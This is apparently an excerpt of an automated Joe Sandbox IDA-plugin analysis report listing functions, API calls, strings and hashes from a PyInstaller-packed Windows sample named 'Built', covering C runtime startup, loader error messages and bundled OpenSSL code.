__scrt_release_startup_lock.LIBCMT ref: 00007FFE101DA3A5

Memory Dump Source

Source File: 00000005.00000002.2109405337.00007FFE101D1000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFE101D0000, based on PE: true

Associated: 00000005.00000002.2109058392.00007FFE101D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109405337.00007FFE101E5000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109475898.00007FFE101E6000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000005.00000002.2109504920.00007FFE101E8000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe101d0000_Built.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: b9fa9b40e9c6789a1c7bb0bf4cecc2e391048a790accc609840ad08e000dacb4
Instruction ID: 102c5d005946a40ecc7ab0b29632c07c8ba32af1afd407771baf6e6c665f84f9
Opcode Fuzzy Hash: b9fa9b40e9c6789a1c7bb0bf4cecc2e391048a790accc609840ad08e000dacb4
Instruction Fuzzy Hash: 1D819F23F08E4386FA50EB67A4592B96291AF457A0FD841B7DBCD477B6DE3CE4418700

Function 00007FFDF0FA27C0 Relevance: 16.7, APIs: 11, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFDF0FA27E8
__scrt_initialize_crt.LIBCMT ref: 00007FFDF0FA282D
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFDF0FA283A
_RTC_Initialize.LIBCMT ref: 00007FFDF0FA2868
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFDF0FA288E
__scrt_release_startup_lock.LIBCMT ref: 00007FFDF0FA28B9

Memory Dump Source

Source File: 00000005.00000002.2090834885.00007FFDF0FA1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFDF0FA0000, based on PE: true

Associated: 00000005.00000002.2090802749.00007FFDF0FA0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1004000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1050000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF1053000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10AC000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B1000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2090834885.00007FFDF10B4000.00000040.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091138354.00007FFDF10B5000.00000080.00000001.01000000.00000017.sdmpDownload File
Associated: 00000005.00000002.2091174931.00007FFDF10B7000.00000004.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf0fa0000_Built.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 349153199-0
Opcode ID: 4d981778426152582bd2bcf391e0cfb6d03b1f255c64df104127e21353c62d29
Instruction ID: 4218d38c70e60c287a7ba638642fdfd1adacb06e51db33824f210fa54a254ccd
Opcode Fuzzy Hash: 4d981778426152582bd2bcf391e0cfb6d03b1f255c64df104127e21353c62d29
Instruction Fuzzy Hash: EB81A421F0C64346F7949B699469A792290AFC9BA0F048235E96CCF7DEDF3CE845A700

Function 00007FF626656300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626656343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626656730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266569CC

Strings

:, xrefs: 00007FF6266564FC
f, xrefs: 00007FF626656465
p, xrefs: 00007FF6266563F5
p, xrefs: 00007FF62665646D
-, xrefs: 00007FF6266563D9

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: ec7ddd7b67d6b4d5751b74ee3fc6fcfd7aba4e139fa18444d0589274eba5fc10
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: 5A12C372E0C25386FF205B15D91627976A1FB40754FA44035E68AC6AE6DF3EE880EF03

Function 00007FF626651038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626651078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626651440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266516DF

Strings

f, xrefs: 00007FF6266512C5
f, xrefs: 00007FF626651110
p, xrefs: 00007FF62665111D
f, xrefs: 00007FF62665117A
p, xrefs: 00007FF626651182

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 9632e876b8c1ce5351e1f41cf479b18e296a2ed9016b031683b40ff00222578a
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: 4712D736E0C24386FF209A15E856679F661FB40754F884135E699C7AC6DF7EE880AF03

Function 00007FF626641050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6266410CC
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6266411F6
fread, xrefs: 00007FF6266411FD
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF626641108
fseek, xrefs: 00007FF6266410D3
Failed to extract %s: failed to open archive file!, xrefs: 00007FF626641098
malloc, xrefs: 00007FF62664110F

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 6c44fc12f90ac9abec2ec16274bdf5e9c83ab404e8f3d54f1266a05c4574213e
Instruction ID: ea459771d120b28ccf55a19ca2f26ea919cbe2c3e5c55044ade80ddbd5e43963
Opcode Fuzzy Hash: 6c44fc12f90ac9abec2ec16274bdf5e9c83ab404e8f3d54f1266a05c4574213e
Instruction Fuzzy Hash: F041A021B0865382EE20DB12EC616B9A394FF94BC4F544432ED0C97796DE7EE105AB43

Function 00007FFDF10C41D8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 117networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFDF118A48E
WSAGetLastError.WS2_32 ref: 00007FFDF118A498

Strings

o, xrefs: 00007FFDF118A5BF
..\s\crypto\bio\b_sock2.c, xrefs: 00007FFDF118A41E, 00007FFDF118A4AE, 00007FFDF118A4CA, 00007FFDF118A533, 00007FFDF118A54F, 00007FFDF118A5AB, 00007FFDF118A5C7

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: ..\s\crypto\bio\b_sock2.c$o
API String ID: 1729277954-1872632005
Opcode ID: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
Instruction ID: 519b093255519e7fcd3b3492249db49dd927d3318c79c98b72f1a5583eaa0325
Opcode Fuzzy Hash: 55b9dc58d84091389097999520ee8ef412c939128f98883080a21d6a8e2db22d
Instruction Fuzzy Hash: 49519F32B0854287E720DB21E824ABA77A4FB81748F548235EA6947ADDCF3DE545DB40

Function 00007FF626648850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF626643CBB), ref: 00007FF6266488F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF626643CBB), ref: 00007FF6266488FA
CreateDirectoryW.KERNEL32(?,00000000,00007FF626643CBB), ref: 00007FF62664893C

Part of subcall function 00007FF626648A20: GetEnvironmentVariableW.KERNEL32(00007FF62664388E), ref: 00007FF626648A57
Part of subcall function 00007FF626648A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF626648A79

Part of subcall function 00007FF6266582A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6266582C1

Part of subcall function 00007FF626642810: MessageBoxW.USER32 ref: 00007FF6266428EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF6266488CC
TMP, xrefs: 00007FF6266488B2
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF62664896E
_MEI%d, xrefs: 00007FF626648902
TMP, xrefs: 00007FF62664888C, 00007FF626648993

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
Instruction ID: d1c2097c09a65ae52e3de87895b7cb93a422814bcefb53fe74365e0db9a5539d
Opcode Fuzzy Hash: 6ea14b1c2d16789ddeaa0d8cc05df9935aa6d91fa7ad17376743f3d33dced37a
Instruction Fuzzy Hash: FF41A221A19A8354FE20AB66AC662B91391BF857C4F400135ED0DC77D6DE7EE504EB03

Function 00007FFDF10C1D48 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFDF13046BB
GetModuleHandleA.KERNEL32 ref: 00007FFDF13046CD
GetModuleHandleW.KERNEL32 ref: 00007FFDF13046DA
GetProcAddress.KERNEL32 ref: 00007FFDF1304742

Strings

OPENSSL_Applink, xrefs: 00007FFDF130473B
_ssl.pyd, xrefs: 00007FFDF13046B4
OPENSSL_Uplink(%p,%02X): , xrefs: 00007FFDF1304652
_ssl_d.pyd, xrefs: 00007FFDF13046C6

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: OPENSSL_Applink$OPENSSL_Uplink(%p,%02X): $_ssl.pyd$_ssl_d.pyd
API String ID: 1883125708-1130596517
Opcode ID: a59ad196c7dd92c8529259541892207718703ab64594e6dd5a010e556f2476ad
Instruction ID: f6e89db7f4b3299a6f7a1e2ea2691845e4bfdc763bae2cf92f33481fe04ba35a
Opcode Fuzzy Hash: a59ad196c7dd92c8529259541892207718703ab64594e6dd5a010e556f2476ad
Instruction Fuzzy Hash: B3511222E08B5382E711AF64E96097423E8BF69B68F059735D97D422E9DF7CB585C300

Function 00007FFDF10C23D3 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFDF11CDA48
GetProcAddress.KERNEL32 ref: 00007FFDF11CDA5D
GetProcessWindowStation.USER32 ref: 00007FFDF11CDA87
GetUserObjectInformationW.USER32 ref: 00007FFDF11CDAAF
GetLastError.KERNEL32 ref: 00007FFDF11CDABD
GetUserObjectInformationW.USER32 ref: 00007FFDF11CDB28

Strings

_OPENSSL_isservice, xrefs: 00007FFDF11CDA53
Service-0x, xrefs: 00007FFDF11CDB49

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1339000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF136A000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1390000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13DE000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E4000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF13E6000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1402000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF140F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092865869.00007FFDF1413000.00000080.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2092944994.00007FFDF1414000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf10c0000_Built.jbxd

Similarity

API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow
String ID: Service-0x$_OPENSSL_isservice
API String ID: 1944374717-1672312481
Opcode ID: bc225b995bbff2d3b119e7081b5c779a5c3234c2f77d3222796a288c2c9d01dd
Instruction ID: 2389c5e570f6dd94bfd1ea696d2b3deab53c6545e22cfaa88aae338dc515a987
Opcode Fuzzy Hash: bc225b995bbff2d3b119e7081b5c779a5c3234c2f77d3222796a288c2c9d01dd
Instruction Fuzzy Hash: F1416F22B09B8686EF509F25D860AA92398FF497B4B484734E93D477E9EF3CE5058340

Function 00007FF62664EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF62664EAD5

Part of subcall function 00007FF62664FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF62664FA6F
Part of subcall function 00007FF62664FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF62664FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF62664EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF62664EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF62664EF08

Strings

csm, xrefs: 00007FF62664EBD0
csm, xrefs: 00007FF62664EB56
csm, xrefs: 00007FF62664EAEF

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 5f6e5a8d7ce8e0709680fd795fe98228c59e7ffb7f5205fd67780d0096b8d917
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 5AD18272A087818AEF309BA5D8503AE37A0FB95788F100135EE4D97B95DF7AE440DB43

Function 00007FF62665ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF62665F11A,?,?,000002B9B7119798,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF62665F11A,?,?,000002B9B7119798,00007FF62665ADC3,?,?,?,00007FF62665ACBA,?,?,?,00007FF626655FAE), ref: 00007FF62665EF08

Strings

api-ms-, xrefs: 00007FF62665EE46
ext-ms-, xrefs: 00007FF62665EE59

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: eefb4ea9b3849d784e0029f3cee8cd32d2a6c79f7804c6edab273b240fc2dec5
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: D9414321B28A5281FF16CB52AC456752391BF49BD0F884139EC1DCB385EF3EE405AB83

Function 00007FF626642C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
MessageBoxW.USER32 ref: 00007FF626642D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF626642D70
%ls: , xrefs: 00007FF626642D22
[PYI-%d:ERROR] , xrefs: 00007FF626642CA6
Error, xrefs: 00007FF626642D8C

Memory Dump Source

Source File: 00000005.00000002.2090601565.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000005.00000002.2090568689.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090644619.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090680126.00007FF626681000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.2090767121.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff626640000_Built.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 704e3d742f45a51c86662386fcc1f1352d8b00ffb4fe915c2e67ada048d927d3
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 4F31F622708A4182EA20AB21BC502BA6795BF88BC8F400136EF4DD7759DF7DD516DB02

Function 00007FFDF10C60CD Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON

Download Yara Rule

APIs

SwitchToFiber.KERNEL32 ref: 00007FFDF1183534
CreateFiber.KERNEL32 ref: 00007FFDF11835AC
SwitchToFiber.KERNEL32 ref: 00007FFDF1183628
DeleteFiber.KERNEL32 ref: 00007FFDF118370B

Strings

..\s\crypto\async\async.c, xrefs: 00007FFDF1183451, 00007FFDF1183468, 00007FFDF11834B0, 00007FFDF11835D9, 00007FFDF1183640, 00007FFDF11836C0, 00007FFDF11836F6, 00007FFDF1183717, 00007FFDF1183744
*, xrefs: 00007FFDF118346F

Memory Dump Source

Source File: 00000005.00000002.2091238325.00007FFDF10C1000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDF10C0000, based on PE: true

Associated: 00000005.00000002.2091206646.00007FFDF10C0000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF10CD000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1125000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1139000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF1149000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF115D000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000005.00000002.2091238325.00007FFDF130E000.00000040.00000001.01000000.00000014.sdmpDownload File
